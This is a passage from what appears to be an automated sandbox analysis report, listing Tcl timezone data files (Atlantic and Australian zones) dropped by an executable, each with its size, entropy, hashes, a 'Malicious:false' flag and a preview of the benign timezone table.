                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                              MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                              SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                              SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                              SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                              MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                              SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                              SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                              SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6796
                                                                                                                                                                                                                              Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                              SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                              SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                              SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                              MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                              SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                              SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                              SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                              Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                              MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                              SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                              SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                              SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.910514445868106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGsA/8rVDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQjQD4
                                                                                                                                                                                                                              MD5:ECB480DA99D29C0ACE67426D45534754
                                                                                                                                                                                                                              SHA1:784CF126B030C3D883EE541877E6181F795C9697
                                                                                                                                                                                                                              SHA-256:BDA015714260001BAE2848991DD21E802580BE2915797E5DABC376135D1C5246
                                                                                                                                                                                                                              SHA-512:54C1B20E45C7C73354DCD4E0F4444720771820ED10B282F745DC391BEADEAEDC629BEF97B1908FB62CDAEC915D32AF1F54FC6AA9DC83E317E7CE19FC2586EF28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/Reykjavik) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                              Entropy (8bit):5.011466665416709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2RQqGtlN62/EiMXGm2OHXT14YoHvhFvdQVIyV:SlSWB9eg/2RQrlo2MiDm2OHXqYoHvTFS
                                                                                                                                                                                                                              MD5:3B310BB8C90CA716DC1AC5A697ACA9CD
                                                                                                                                                                                                                              SHA1:CD583F49478DCDAD91EF78539502C6FC62945C1E
                                                                                                                                                                                                                              SHA-256:51BFABCB3388107753A3C1A8CF31118E6627132BAA09B9878D9E7CEDBEBB4886
                                                                                                                                                                                                                              SHA-512:F593B7A1FAF0EA6B42D5EE86C20C9A8F5CD7ACD9B30EF7755E45ECAFEA8752C32E4CF4BEDF531F494E59D9F0C49CCC6FCA077292E20794AA265DFC0A56DFE579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/South_Georgia) {.. {-9223372036854775808 -8768 0 LMT}.. {-2524512832 -7200 0 -02}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.880390141563645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2RQqGt4r+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2RQr4rV
                                                                                                                                                                                                                              MD5:2C73A963F515376A46762CE153AAF5C5
                                                                                                                                                                                                                              SHA1:996C3C93DFAD89EA80AC5DFA1DFBD7CECD9ED28D
                                                                                                                                                                                                                              SHA-256:1C9CA8966FC8BD0BE70F4A187E17E56FB99139BC88C392E82BA2E23E23111C54
                                                                                                                                                                                                                              SHA-512:35A9ADC047DB058D71C21FC4ECB57CD14B0D9BA4416506763D1800D72CE6C9E81636F332AAD3533616F05C86F90A60416BD4065C5F832A51AA3DC186218BDCAE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2256
                                                                                                                                                                                                                              Entropy (8bit):3.662522763865322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:506KSBSdSs2SbSwGSyPU3lSsS5SGScSo/SkSuShSceS3SBSc7XSiSgSwSd/SJkS6:JKU+Ew0FU1TuhrR//tOIoOjXZfDWSkPR
                                                                                                                                                                                                                              MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                              SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                              SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                              SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                              MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                              SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                              SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                              SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                                              Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                              SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                              SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                              SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                              Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                              MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                              SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                              SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                              SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8437
                                                                                                                                                                                                                              Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                              MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                              SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                              SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                              SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                              MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                              SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                              SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                              SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                              MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                              SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                              SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                              SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):437
                                                                                                                                                                                                                              Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                              MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                              SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                              SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                              SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
